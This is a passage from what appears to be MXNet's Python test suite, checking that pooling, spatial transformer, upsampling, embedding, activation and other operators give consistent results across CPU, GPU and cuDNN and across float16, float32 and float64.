{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
    # While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
    # We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
    # While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
    # We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases when all implementations should match- the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
        # Double the float16 tol when comparing v1 and non-v1 implementations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
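        # Illustration of note 2 above (informal, not executed by the test): for an all-negative
        # input and pad=1, zero padding lets 0 win the max, while -inf-style padding does not:
        #   np.max(np.pad([[-5.]], 1, constant_values=0))       -> 0.0
        #   np.max(np.pad([[-5.]], 1, constant_values=-np.inf)) -> -5.0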
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
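        # Illustrative only: the two results above follow from the (assumed) ceil-based rule
        # for the 'full' convention; the tiny helper below just re-derives them.
        def full_out_dim(in_dim, pad_dim, kernel_dim, stride_dim):
            return int(np.ceil(float(in_dim + 2 * pad_dim - kernel_dim) / stride_dim)) + 1
        assert full_out_dim(10, 1, 4, 3) == 4   # o_h
        assert full_out_dim(10, 2, 5, 4) == 4   # o_w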
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale')
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up')
check_consistency(sym, ctx_list)
@with_seed()
def test_global_pooling():
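    # With global_pool=True the kernel/pad/stride arguments should be ignored, so every
    # symbol variant constructed below (with or without them, cudnn on or off) must agree.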
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
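            # Indices intentionally span [-low_pad, V + high_pad) so that out-of-range lookups
            # are exercised alongside valid ones.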
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
